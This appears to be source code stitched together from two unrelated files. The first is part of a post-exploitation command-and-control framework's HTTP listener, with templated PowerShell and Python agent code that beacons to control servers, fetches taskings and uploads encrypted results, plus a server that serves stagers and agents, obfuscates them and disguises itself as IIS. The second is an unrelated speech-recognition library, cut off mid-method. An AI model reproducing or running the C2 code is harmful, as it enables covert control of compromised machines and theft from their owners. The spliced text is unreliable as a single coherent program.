$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
# build the web request object
$""" + helpers.generate_random_script_var_name("wc") + """ = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = $Script:Proxy;
}
$""" + helpers.generate_random_script_var_name("wc") + """.Headers.Add("User-Agent",$script:UserAgent)
$script:Headers.GetEnumerator() | % {$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add($_.Name, $_.Value)}
$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add("Cookie",\"""" + self.session_cookie + """session=$RoutingCookie")
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$result = $""" + helpers.generate_random_script_var_name("wc") + """.DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
$result
}
}
catch [Net.WebException] {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
"""
sendMessage = """
$script:SendMessage = {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
# build the web request object
$""" + helpers.generate_random_script_var_name("wc") + """ = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = $Script:Proxy;
}
$""" + helpers.generate_random_script_var_name("wc") + """.Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add($_.Name, $_.Value)}
try {
# get a random posting URI
$taskURI = $Script:TaskURIs | Get-Random
$response = $""" + helpers.generate_random_script_var_name("wc") + """.UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket);
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None"
# Import sockschain code
f = open(self.mainMenu.installPath + "/data/agent/stagers/common/sockschain.py")
socks_import = f.read()
f.close()
sendMessage = f"""
def update_proxychain(proxy_list):
setdefaultproxy() # Clear the default chain
for proxy in proxy_list:
addproxy(proxytype=proxy['proxytype'], addr=proxy['addr'], port=proxy['port'])
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
global missedCheckins
global server
global headers
global taskURIs
data = None
if packets:
# aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, packets)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
else:
# if we're GETing taskings, then build the routing packet to stuff into a cookie first.
# meta TASKING_REQUEST = 4
routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
b64routingPacket = base64.b64encode(routingPacket).decode('UTF-8')
headers['Cookie'] = "{self.session_cookie}session=%s" % (b64routingPacket)
taskURI = random.sample(taskURIs, 1)[0]
requestUri = server + taskURI
try:
wrapmodule(urllib.request)
data = (urllib.request.urlopen(urllib.request.Request(requestUri, data, headers))).read()
return ('200', data)
except urllib.request.HTTPError as HTTPError:
# if the server is reached, but returns an error (like 404)
missedCheckins = missedCheckins + 1
#if signaled for restaging, exit.
if HTTPError.code == 401:
sys.exit(0)
return (HTTPError.code, '')
except urllib.request.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
"""
return socks_import + updateServers + sendMessage
else:
print(helpers.color(
"[!] listeners/http generate_comms(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
else:
print(helpers.color('[!] listeners/http generate_comms(): no language specified!'))
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
stagerURI = listenerOptions['StagerURI']['Value']
userAgent = self.options['UserAgent']['Value']
listenerName = self.options['Name']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
app = Flask(__name__)
self.app = app
# Set HTTP/1.1 as in IIS 7.5 instead of /1.0
WSGIRequestHandler.protocol_version = "HTTP/1.1"
@app.route('/download/<stager>')
def send_stager(stager):
if 'po' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=False,
userAgent=userAgent, proxy=proxy,
proxyCreds=proxyCreds)
return launcher
elif 'py' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', encode=False,
userAgent=userAgent, proxy=proxy,
proxyCreds=proxyCreds)
return launcher
else:
return make_response(self.default_response(), 404)
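        # e.g., GET /download/powershell (any stager value containing 'po') returns the
        # PowerShell launcher one-liner, while /download/python returns the Python launcher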
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
listenerName = self.options['Name']['Value']
message = "[!] {} on the blacklist/not on the whitelist requested resource".format(request.remote_addr)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.after_request
def change_header(response):
"Modify the headers response server."
headers = listenerOptions['Headers']['Value']
for key in headers.split("|"):
value = key.split(":")
response.headers[value[0]] = value[1]
return response
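        # e.g., a Headers option value of "Server:Microsoft-IIS/7.5|X-Powered-By:ASP.NET"
        # (a hypothetical setting) would be applied as two separate response headers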
@app.after_request
def add_proxy_headers(response):
"Add HTTP headers to avoid proxy caching."
response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
response.headers['Pragma'] = "no-cache"
response.headers['Expires'] = "0"
return response
@app.errorhandler(405)
def handle_405(e):
"""
Returns IIS 7.5 405 page for every Flask 405 error.
"""
return make_response(self.method_not_allowed_page(), 405)
@app.route('/')
@app.route('/iisstart.htm')
def serve_index():
"""
Return default server web page if user navigates to index.
"""
return make_response(self.index_page(), 200)
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
if request_uri.lower() == 'welcome.png':
# Serves image loaded by index page.
#
# Thanks to making it case-insensitive it works the same way as in
# an actual IIS server
static_dir = self.mainMenu.installPath + "/data/misc/"
return send_from_directory(static_dir, 'welcome.png')
clientIP = request.remote_addr
listenerName = self.options['Name']['Value']
message = "[*] GET request for {}/{} from {}".format(request.host, request_uri, clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
routingPacket = None
cookie = request.headers.get('Cookie')
if cookie and cookie != '':
try:
# see if we can extract the 'routing packet' from the specified cookie location
                    # NOTE: this can easily be moved to a parameter, another cookie value, etc.
if self.session_cookie in cookie:
listenerName = self.options['Name']['Value']
message = "[*] GET cookie value from {} : {}".format(clientIP, cookie)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
cookieParts = cookie.split(';')
for part in cookieParts:
if part.startswith(self.session_cookie):
base64RoutingPacket = part[part.find('=') + 1:]
# decode the routing packet base64 value in the cookie
routingPacket = base64.b64decode(base64RoutingPacket)
except Exception as e:
routingPacket = None
pass
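            # at this point routingPacket is either None or the decoded bytes from the
            # session cookie; e.g., assuming a cookie named 'session', a header of
            # "session=QUJDRA==" would decode to b'ABCD'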
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions,
clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if isinstance(results, str):
results = results.encode('UTF-8')
if results == b'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
listenerName = self.options['Name']['Value']
message = "[*] Sending {} stager (stage 1) to {}".format(language, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
stage = self.generate_stager(language=language, listenerOptions=listenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(stage, 200)
elif results.startswith(b'ERROR:'):
listenerName = self.options['Name']['Value']
message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(
request_uri, clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
if b'not in cache' in results:
# signal the client to restage
print(helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP)))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 200)
else:
# actual taskings
listenerName = self.options['Name']['Value']
message = "[*] Agent from {} retrieved taskings".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(results, 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http')
return make_response(self.default_response(), 200)
else:
return make_response(self.default_response(), 200)
else:
listenerName = self.options['Name']['Value']
message = "[!] {} requested by {} with no routing packet.".format(request_uri, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
requestData = request.get_data()
listenerName = self.options['Name']['Value']
message = "[*] POST request data length from {} : {}".format(clientIP, len(requestData))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if isinstance(results, str):
results = results.encode('UTF-8')
if results:
if results.startswith(b'STAGE2'):
# TODO: document the exact results structure returned
if ':' in clientIP:
clientIP = '[' + str(clientIP) + ']'
sessionID = results.split(b' ')[1].strip().decode('UTF-8')
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
listenerName = self.options['Name']['Value']
message = "[*] Sending agent (stage 2) to {} at {}".format(sessionID, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
hopListenerName = request.headers.get('Hop-Name')
# Check for hop listener
hopListener = data_util.get_listener_options(hopListenerName)
tempListenerOptions = copy.deepcopy(listenerOptions)
if hopListener is not None:
tempListenerOptions['Host']['Value'] = hopListener.options['Host']['Value']
else:
tempListenerOptions = listenerOptions
session_info = Session().query(models.Agent).filter(models.Agent.session_id == sessionID).first()
if session_info.language == 'ironpython':
version = 'ironpython'
else:
version = ''
# step 6 of negotiation -> server sends patched agent.ps1/agent.py
agentCode = self.generate_agent(language=language, listenerOptions=tempListenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand,
version=version)
encryptedAgent = encryption.aes_encrypt_then_hmac(sessionKey, agentCode)
# TODO: wrap ^ in a routing packet?
return make_response(encryptedAgent, 200)
elif results[:10].lower().startswith(b'error') or results[:10].lower().startswith(b'exception'):
listenerName = self.options['Name']['Value']
message = "[!] Error returned for results by {} : {}".format(clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
elif results.startswith(b'VALID'):
listenerName = self.options['Name']['Value']
message = "[*] Valid results returned by {}".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 200)
else:
return make_response(results, 200)
else:
return make_response(self.default_response(), 404)
else:
return make_response(self.default_response(), 404)
try:
certPath = listenerOptions['CertPath']['Value']
host = listenerOptions['Host']['Value']
if certPath.strip() != '' and host.startswith('https'):
certPath = os.path.abspath(certPath)
                pyversion = sys.version_info
                # support any version of TLS
if pyversion[0] == 2 and pyversion[1] == 7 and pyversion[2] >= 13:
proto = ssl.PROTOCOL_TLS
elif pyversion[0] >= 3:
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
context = ssl.SSLContext(proto)
context.load_cert_chain("%s/empire-chain.pem" % (certPath), "%s/empire-priv.key" % (certPath))
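                # pair one randomly chosen TLS 1.2 suite with one TLS 1.0 fallback so the
                # listener's TLS fingerprint varies across restarts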
cipherlist_tls12 = ["ECDHE-RSA-AES256-GCM-SHA384", "ECDHE-RSA-AES128-GCM-SHA256", "ECDHE-RSA-AES256-SHA384", "AES256-SHA256", "AES128-SHA256"]
cipherlist_tls10 = ["ECDHE-RSA-AES256-SHA"]
selectciph = random.choice(cipherlist_tls12)+':'+random.choice(cipherlist_tls10)
context.set_ciphers(selectciph)
app.run(host=bindIP, port=int(port), threaded=True, ssl_context=context)
else:
app.run(host=bindIP, port=int(port), threaded=True)
except Exception as e:
print(helpers.color("[!] Listener startup on port %s failed: %s " % (port, e)))
listenerName = self.options['Name']['Value']
message = "[!] Listener startup on port {} failed: {}".format(port, e)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
def start(self, name=''):
"""
Start a threaded instance of self.start_server() and store it in the
self.threads dictionary keyed by the listener name.
"""
listenerOptions = self.options
if name and name != '':
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
else:
name = listenerOptions['Name']['Value']
self.threads[name] = helpers.KThread(target=self.start_server, args=(listenerOptions,))
self.threads[name].start()
time.sleep(1)
# returns True if the listener successfully started, false otherwise
return self.threads[name].is_alive()
def shutdown(self, name=''):
"""
Terminates the server thread stored in the self.threads dictionary,
keyed by the listener name.
"""
if name and name != '':
print(helpers.color("[!] Killing listener '%s'" % (name)))
self.threads[name].kill()
else:
print(helpers.color("[!] Killing listener '%s'" % (self.options['Name']['Value'])))
self.threads[self.options['Name']['Value']].kill()
def generate_cookie(self):
"""
Generate Cookie
"""
chars = string.ascii_letters
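        # e.g., a generated cookie name might look like 'kXbFqzTm' (6-16 random letters; example value hypothetical)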
cookie = helpers.random_string(random.randint(6, 16), charset=chars)
return cookie
|
__init__.py
|
#!/usr/bin/env python3
"""Library for performing speech recognition, with support for several engines and APIs, online and offline."""
import io
import os
import subprocess
import wave
import aifc
import math
import audioop
import collections
import json
import base64
import threading
import platform
import stat
import hashlib
import hmac
import time
import uuid
import tempfile
import shutil
__author__ = "Anthony Zhang (Uberi)"
__version__ = "3.5.0"
__license__ = "BSD"
try: # attempt to use the Python 2 modules
from urllib import urlencode
from urllib2 import Request, urlopen, URLError, HTTPError
except ImportError: # use the Python 3 modules
from urllib.parse import urlencode
from urllib.request import Request, urlopen
from urllib.error import URLError, HTTPError
class WaitTimeoutError(Exception): pass
class RequestError(Exception): pass
class UnknownValueError(Exception): pass
class AudioSource(object):
def __init__(self):
raise NotImplementedError("this is an abstract class")
def __enter__(self):
raise NotImplementedError("this is an abstract class")
def __exit__(self, exc_type, exc_value, traceback):
raise NotImplementedError("this is an abstract class")
class Microphone(AudioSource):
"""
Creates a new ``Microphone`` instance, which represents a physical microphone on the computer. Subclass of ``AudioSource``.
This will throw an ``AttributeError`` if you don't have PyAudio 0.2.9 or later installed.
If ``device_index`` is unspecified or ``None``, the default microphone is used as the audio source. Otherwise, ``device_index`` should be the index of the device to use for audio input.
A device index is an integer between 0 and ``pyaudio.get_device_count() - 1`` (assume we have used ``import pyaudio`` beforehand) inclusive. It represents an audio device such as a microphone or speaker. See the `PyAudio documentation <http://people.csail.mit.edu/hubert/pyaudio/docs/>`__ for more details.
The microphone audio is recorded in chunks of ``chunk_size`` samples, at a rate of ``sample_rate`` samples per second (Hertz).
Higher ``sample_rate`` values result in better audio quality, but also more bandwidth (and therefore, slower recognition). Additionally, some machines, such as some Raspberry Pi models, can't keep up if this value is too high.
Higher ``chunk_size`` values help avoid triggering on rapidly changing ambient noise, but also makes detection less sensitive. This value, generally, should be left at its default.
"""
def __init__(self, device_index=None, sample_rate=16000, chunk_size=1024):
# set up PyAudio
self.pyaudio_module = self.get_pyaudio()
assert device_index is None or isinstance(device_index, int), "Device index must be None or an integer"
if device_index is not None: # ensure device index is in range
audio = self.pyaudio_module.PyAudio()
try:
count = audio.get_device_count() # obtain device count
except:
audio.terminate()
raise
assert 0 <= device_index < count, "Device index out of range ({} devices available; device index should be between 0 and {} inclusive)".format(count, count - 1)
assert isinstance(sample_rate, int) and sample_rate > 0, "Sample rate must be a positive integer"
assert isinstance(chunk_size, int) and chunk_size > 0, "Chunk size must be a positive integer"
self.device_index = device_index
self.format = self.pyaudio_module.paInt16 # 16-bit int sampling
self.SAMPLE_WIDTH = self.pyaudio_module.get_sample_size(self.format) # size of each sample
self.SAMPLE_RATE = sample_rate # sampling rate in Hertz
self.CHUNK = chunk_size # number of frames stored in each buffer
self.audio = None
self.stream = None
@staticmethod
def get_pyaudio():
"""
        Imports the pyaudio module and checks its version. Throws exceptions if PyAudio can't be found or the wrong version is installed.
"""
try:
import pyaudio
except ImportError:
raise AttributeError("Could not find PyAudio; check installation")
from distutils.version import LooseVersion
if LooseVersion(pyaudio.__version__) < LooseVersion("0.2.9"):
raise AttributeError("PyAudio 0.2.9 or later is required (found version {})".format(pyaudio.__version__))
return pyaudio
@staticmethod
def list_microphone_names():
"""
Returns a list of the names of all available microphones. For microphones where the name can't be retrieved, the list entry contains ``None`` instead.
The index of each microphone's name is the same as its device index when creating a ``Microphone`` instance - indices in this list can be used as values of ``device_index``.
"""
audio = Microphone.get_pyaudio().PyAudio()
try:
result = []
for i in range(audio.get_device_count()):
device_info = audio.get_device_info_by_index(i)
result.append(device_info.get("name"))
finally:
audio.terminate()
return result
def __enter__(self):
assert self.stream is None, "This audio source is already inside a context manager"
self.audio = self.pyaudio_module.PyAudio()
try:
self.stream = Microphone.MicrophoneStream(
self.audio.open(
input_device_index=self.device_index, channels=1,
format=self.format, rate=self.SAMPLE_RATE, frames_per_buffer=self.CHUNK,
input=True, # stream is an input stream
)
)
except:
self.audio.terminate()
raise
return self
def __exit__(self, exc_type, exc_value, traceback):
try:
self.stream.close()
finally:
self.stream = None
self.audio.terminate()
class MicrophoneStream(object):
def __init__(self, pyaudio_stream):
self.pyaudio_stream = pyaudio_stream
def read(self, size):
return self.pyaudio_stream.read(size, exception_on_overflow=False)
def close(self):
try:
# sometimes, if the stream isn't stopped, closing the stream throws an exception
if not self.pyaudio_stream.is_stopped():
self.pyaudio_stream.stop_stream()
finally:
self.pyaudio_stream.close()
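# Usage sketch (assumes PyAudio 0.2.9+ is installed; the device index is hypothetical):
#
#   print(Microphone.list_microphone_names())  # choose a device index from this list
#   mic = Microphone(device_index=0, sample_rate=16000, chunk_size=1024)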
class AudioFile(AudioSource):
"""
Creates a new ``AudioFile`` instance given a WAV/AIFF/FLAC audio file ``filename_or_fileobject``. Subclass of ``AudioSource``.
If ``filename_or_fileobject`` is a string, then it is interpreted as a path to an audio file on the filesystem. Otherwise, ``filename_or_fileobject`` should be a file-like object such as ``io.BytesIO`` or similar.
Note that functions that read from the audio (such as ``recognizer_instance.record`` or ``recognizer_instance.listen``) will move ahead in the stream. For example, if you execute ``recognizer_instance.record(audiofile_instance, duration=10)`` twice, the first time it will return the first 10 seconds of audio, and the second time it will return the 10 seconds of audio right after that. This is always reset to the beginning when entering an ``AudioFile`` context.
WAV files must be in PCM/LPCM format; WAVE_FORMAT_EXTENSIBLE and compressed WAV are not supported and may result in undefined behaviour.
Both AIFF and AIFF-C (compressed AIFF) formats are supported.
FLAC files must be in native FLAC format; OGG-FLAC is not supported and may result in undefined behaviour.
"""
def __init__(self, filename_or_fileobject):
if str is bytes: # Python 2 - if a file path is specified, it must either be a ``str`` instance or a ``unicode`` instance
assert isinstance(filename_or_fileobject, (type(""), type(u""))) or hasattr(filename_or_fileobject, "read"), "Given audio file must be a filename string or a file-like object"
else: # Python 3 - if a file path is specified, it must be a ``str`` instance
assert isinstance(filename_or_fileobject, str) or hasattr(filename_or_fileobject, "read"), "Given audio file must be a filename string or a file-like object"
self.filename_or_fileobject = filename_or_fileobject
self.stream = None
self.DURATION = None
def __enter__(self):
assert self.stream is None, "This audio source is already inside a context manager"
try:
# attempt to read the file as WAV
self.audio_reader = wave.open(self.filename_or_fileobject, "rb")
self.little_endian = True # RIFF WAV is a little-endian format (most ``audioop`` operations assume that the frames are stored in little-endian form)
except wave.Error:
try:
# attempt to read the file as AIFF
self.audio_reader = aifc.open(self.filename_or_fileobject, "rb")
self.little_endian = False # AIFF is a big-endian format
except aifc.Error:
# attempt to read the file as FLAC
if hasattr(self.filename_or_fileobject, "read"):
flac_data = self.filename_or_fileobject.read()
else:
with open(self.filename_or_fileobject, "rb") as f: flac_data = f.read()
# run the FLAC converter with the FLAC data to get the AIFF data
flac_converter = get_flac_converter()
process = subprocess.Popen([
flac_converter,
"--stdout", "--totally-silent", # put the resulting AIFF file in stdout, and make sure it's not mixed with any program output
"--decode", "--force-aiff-format", # decode the FLAC file into an AIFF file
"-", # the input FLAC file contents will be given in stdin
], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
aiff_data, stderr = process.communicate(flac_data)
aiff_file = io.BytesIO(aiff_data)
try:
self.audio_reader = aifc.open(aiff_file, "rb")
except aifc.Error:
raise ValueError("Audio file could not be read as PCM WAV, AIFF/AIFF-C, or Native FLAC; check if file is corrupted or in another format")
self.little_endian = False # AIFF is a big-endian format
assert 1 <= self.audio_reader.getnchannels() <= 2, "Audio must be mono or stereo"
self.SAMPLE_WIDTH = self.audio_reader.getsampwidth()
# 24-bit audio needs some special handling for old Python versions (workaround for https://bugs.python.org/issue12866)
samples_24_bit_pretending_to_be_32_bit = False
if self.SAMPLE_WIDTH == 3: # 24-bit audio
try: audioop.bias(b"", self.SAMPLE_WIDTH, 0) # test whether this sample width is supported (for example, ``audioop`` in Python 3.3 and below don't support sample width 3, while Python 3.4+ do)
except audioop.error: # this version of audioop doesn't support 24-bit audio (probably Python 3.3 or less)
samples_24_bit_pretending_to_be_32_bit = True # while the ``AudioFile`` instance will outwardly appear to be 32-bit, it will actually internally be 24-bit
self.SAMPLE_WIDTH = 4 # the ``AudioFile`` instance should present itself as a 32-bit stream now, since we'll be converting into 32-bit on the fly when reading
self.SAMPLE_RATE = self.audio_reader.getframerate()
self.CHUNK = 4096
self.FRAME_COUNT = self.audio_reader.getnframes()
self.DURATION = self.FRAME_COUNT / float(self.SAMPLE_RATE)
self.stream = AudioFile.AudioFileStream(self.audio_reader, self.little_endian, samples_24_bit_pretending_to_be_32_bit)
return self
def __exit__(self, exc_type, exc_value, traceback):
if not hasattr(self.filename_or_fileobject, "read"): # only close the file if it was opened by this class in the first place (if the file was originally given as a path)
self.audio_reader.close()
self.stream = None
self.DURATION = None
class AudioFileStream(object):
def __init__(self, audio_reader, little_endian, samples_24_bit_pretending_to_be_32_bit):
self.audio_reader = audio_reader # an audio file object (e.g., a `wave.Wave_read` instance)
self.little_endian = little_endian # whether the audio data is little-endian (when working with big-endian things, we'll have to convert it to little-endian before we process it)
self.samples_24_bit_pretending_to_be_32_bit = samples_24_bit_pretending_to_be_32_bit # this is true if the audio is 24-bit audio, but 24-bit audio isn't supported, so we have to pretend that this is 32-bit audio and convert it on the fly
def read(self, size=-1):
buffer = self.audio_reader.readframes(self.audio_reader.getnframes() if size == -1 else size)
if not isinstance(buffer, bytes): buffer = b"" # workaround for https://bugs.python.org/issue24608
sample_width = self.audio_reader.getsampwidth()
if not self.little_endian: # big endian format, convert to little endian on the fly
if hasattr(audioop, "byteswap"): # ``audioop.byteswap`` was only added in Python 3.4 (incidentally, that also means that we don't need to worry about 24-bit audio being unsupported, since Python 3.4+ always has that functionality)
buffer = audioop.byteswap(buffer, sample_width)
else: # manually reverse the bytes of each sample, which is slower but works well enough as a fallback
buffer = buffer[sample_width - 1::-1] + b"".join(buffer[i + sample_width:i:-1] for i in range(sample_width - 1, len(buffer), sample_width))
# workaround for https://bugs.python.org/issue12866
if self.samples_24_bit_pretending_to_be_32_bit: # we need to convert samples from 24-bit to 32-bit before we can process them with ``audioop`` functions
buffer = b"".join("\x00" + buffer[i:i + sample_width] for i in range(0, len(buffer), sample_width)) # since we're in little endian, we prepend a zero byte to each 24-bit sample to get a 32-bit sample
if self.audio_reader.getnchannels() != 1: # stereo audio
buffer = audioop.tomono(buffer, sample_width, 1, 1) # convert stereo audio data to mono
return buffer
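# Usage sketch (the file path is hypothetical; Recognizer is defined below):
#
#   r = Recognizer()
#   with AudioFile("speech.wav") as source:
#       audio = r.record(source)  # reads the entire file into an AudioData instance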
class AudioData(object):
"""
Creates a new ``AudioData`` instance, which represents mono audio data.
The raw audio data is specified by ``frame_data``, which is a sequence of bytes representing audio samples. This is the frame data structure used by the PCM WAV format.
The width of each sample, in bytes, is specified by ``sample_width``. Each group of ``sample_width`` bytes represents a single audio sample.
The audio data is assumed to have a sample rate of ``sample_rate`` samples per second (Hertz).
Usually, instances of this class are obtained from ``recognizer_instance.record`` or ``recognizer_instance.listen``, or in the callback for ``recognizer_instance.listen_in_background``, rather than instantiating them directly.
"""
def __init__(self, frame_data, sample_rate, sample_width):
assert sample_rate > 0, "Sample rate must be a positive integer"
assert sample_width % 1 == 0 and 1 <= sample_width <= 4, "Sample width must be between 1 and 4 inclusive"
self.frame_data = frame_data
self.sample_rate = sample_rate
self.sample_width = int(sample_width)
def get_raw_data(self, convert_rate=None, convert_width=None):
"""
Returns a byte string representing the raw frame data for the audio represented by the ``AudioData`` instance.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
Writing these bytes directly to a file results in a valid `RAW/PCM audio file <https://en.wikipedia.org/wiki/Raw_audio_format>`__.
"""
assert convert_rate is None or convert_rate > 0, "Sample rate to convert to must be a positive integer"
assert convert_width is None or (convert_width % 1 == 0 and 1 <= convert_width <= 4), "Sample width to convert to must be between 1 and 4 inclusive"
raw_data = self.frame_data
# make sure unsigned 8-bit audio (which uses unsigned samples) is handled like higher sample width audio (which uses signed samples)
if self.sample_width == 1:
raw_data = audioop.bias(raw_data, 1, -128) # subtract 128 from every sample to make them act like signed samples
# resample audio at the desired rate if specified
if convert_rate is not None and self.sample_rate != convert_rate:
raw_data, _ = audioop.ratecv(raw_data, self.sample_width, 1, self.sample_rate, convert_rate, None)
# convert samples to desired sample width if specified
if convert_width is not None and self.sample_width != convert_width:
if convert_width == 3: # we're converting the audio into 24-bit (workaround for https://bugs.python.org/issue12866)
raw_data = audioop.lin2lin(raw_data, self.sample_width, 4) # convert audio into 32-bit first, which is always supported
try: audioop.bias(b"", 3, 0) # test whether 24-bit audio is supported (for example, ``audioop`` in Python 3.3 and below don't support sample width 3, while Python 3.4+ do)
except audioop.error: # this version of audioop doesn't support 24-bit audio (probably Python 3.3 or less)
raw_data = b"".join(raw_data[i + 1:i + 4] for i in range(0, len(raw_data), 4)) # since we're in little endian, we discard the first byte from each 32-bit sample to get a 24-bit sample
else: # 24-bit audio fully supported, we don't need to shim anything
raw_data = audioop.lin2lin(raw_data, self.sample_width, convert_width)
else:
raw_data = audioop.lin2lin(raw_data, self.sample_width, convert_width)
# if the output is 8-bit audio with unsigned samples, convert the samples we've been treating as signed to unsigned again
if convert_width == 1:
raw_data = audioop.bias(raw_data, 1, 128) # add 128 to every sample to make them act like unsigned samples again
return raw_data
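    # e.g., audio_data.get_raw_data(convert_rate=16000, convert_width=2) yields 16-bit,
    # 16 kHz, little-endian mono PCM regardless of the instance's original format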
def get_wav_data(self, convert_rate=None, convert_width=None):
"""
Returns a byte string representing the contents of a WAV file containing the audio represented by the ``AudioData`` instance.
If ``convert_width`` is specified and the audio samples are not ``convert_width`` bytes each, the resulting audio is converted to match.
If ``convert_rate`` is specified and the audio sample rate is not ``convert_rate`` Hz, the resulting audio is resampled to match.
Writing these bytes directly to a file results in a valid `WAV file <https://en.wikipedia.org/wiki/WAV>`__.
"""
raw_data = self.get_raw_data(convert_rate, convert_width)
sample_rate = self.sample_rate if convert_rate is None else convert_rate
